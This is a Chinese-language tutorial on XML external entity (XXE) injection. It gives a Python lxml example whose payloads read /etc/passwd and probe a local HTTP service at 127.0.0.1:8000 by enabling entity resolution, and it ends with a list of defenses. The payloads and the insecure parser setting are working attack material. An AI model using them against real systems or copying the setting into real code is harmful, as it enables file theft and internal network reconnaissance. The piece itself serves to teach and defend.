利用 XML 外部实体注入(XXE)读取文件和探测内部网络
引言
XML 外部实体注入(XXE)是一种常见的安全漏洞,攻击者可以通过这种漏洞读取服务器上的文件或探测内部网络。本文将通过一个实际的 Python 代码示例,展示如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。
什么是 XXE?
XML 外部实体注入(XXE)是指在解析 XML 数据时,如果 XML 解析器启用了外部实体解析功能,攻击者可以注入恶意的 XML 实体来访问服务器上的敏感文件或发起网络请求。这种漏洞通常出现在使用 XML 解析库的应用程序中,特别是在未正确配置解析器的情况下。
代码示例
以下是一个 Python 代码示例,展示了如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。
from lxml import etree
import requests
# XML payload to read /etc/passwd
x = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>
"""
# XML payload to probe internal network (e.g., 127.0.0.1)
x1 = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:8000" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>
"""
def parse_xml(xml_bytes):
try:
# Parse the XML bytes with lxml, which supports external entities
parser = etree.XMLParser(resolve_entities=True)
root = etree.fromstring(xml_bytes, parser=parser)
methodname = root.find('methodname').text
print(methodname)
except Exception as e:
print(f"Error: {e}")
# Parse the first XML string
parse_xml(x)
# Parse the second XML string
parse_xml(x1)
代码解析
XML Payload:
x和x1是两个字节字符串,分别包含外部实体&xxe;。x中的外部实体指向/etc/passwd文件。x1中的外部实体指向http://127.0.0.1:8000。
解析函数:
parse_xml函数使用lxml.etree.fromstring解析字节字符串,并打印<methodname>元素的内容。etree.XMLParser(resolve_entities=True)参数启用外部实体解析。
解析 XML 字符串:
- 调用
parse_xml(x)解析第一个 XML 字节字符串,读取/etc/passwd文件内容。 - 调用
parse_xml(x1)解析第二个 XML 字节字符串,探测http://127.0.0.1:8000的内容。
- 调用
运行结果
当运行上述代码时,如果成功读取到 /etc/passwd 文件,将会输出文件内容。如果成功探测到 http://127.0.0.1:8000,将会输出该 URL 的响应内容。
如何防御 XXE 漏洞
为了防止 XXE 漏洞,可以采取以下措施:
- 禁用外部实体解析:在解析 XML 时,禁用外部实体解析功能。例如,在
lxml中,可以使用etree.XMLParser(resolve_entities=False)。 - 使用安全的 XML 解析库:选择那些默认不解析外部实体的库。
- 输入验证:对用户输入进行严格的验证,确保输入的数据符合预期格式。
- 定期更新和打补丁:保持系统和库的最新状态,及时应用安全补丁。
结论
通过上述示例,我们可以看到 XXE 漏洞的潜在危害。了解这些漏洞并采取适当的防御措施对于保护应用程序的安全至关重要。希望本文能够帮助读者更好地理解 XXE 漏洞及其防范方法。